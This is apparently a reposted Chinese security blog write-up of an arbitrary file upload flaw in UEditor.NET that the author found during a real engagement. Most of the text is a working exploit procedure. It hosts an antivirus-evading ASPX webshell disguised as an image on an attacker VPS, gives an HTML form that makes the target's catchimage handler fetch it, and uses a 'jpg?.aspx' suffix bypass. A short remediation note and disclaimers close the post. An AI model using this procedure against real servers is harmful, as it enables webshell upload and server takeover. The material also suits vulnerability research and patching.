0x00 漏洞描述
0x01 漏洞简介
0x02 漏洞环境
这次不用搭建漏洞环境,实战直接遇到一个。
出现以下这个界面,大概率就会存在着任意文件上传。
0x03 漏洞复现
1.正常思路是首先要有一个aspx的免杀图片马,将准备好的图片马上传到自己的vps服务器上面,开启http服务,python -m SimpleHTTPServer 6969。但是我实际上传的时候图片马会被杀(或者是访问不到),所以俺是将aspx的马改为jpg格式上传。
2.在本地,将下面的代码保存为HTML文件,这样就可以利用post方法直接上传文件到目标网站啦,打开之后就是这个样子啦。
根据路径实际情况
<form action="http://IP:port/ueditor/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST"><p>shell addr:<input type="text" name="source[]" /></p ><input type="submit" value="Submit"/></form>
3.双击打开刚刚创建的HTML文件,上传webshell,将后缀修改为:jpg?.aspx绕过,让服务器把文件解析成aspx文件,上传成功后将返回文件的上传路径。
4.拼接上传路径,查看效果,这里没有直接上马,因为只需要验证漏洞可以利用,不需要拿到shell。
0x04 GetShell
0x05 漏洞修复
1.修改CrawlerHandler.cs 增加对文件扩展名的
2.IPS等防御产品可以加入相应的特征
内容仅供学习及自我检测修复,根据此文造成的任何后果均由用户个人承担。
原文始发于微信公众号(米瑞尔信息安全):记一次实战中遇到的UEditor.NET任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论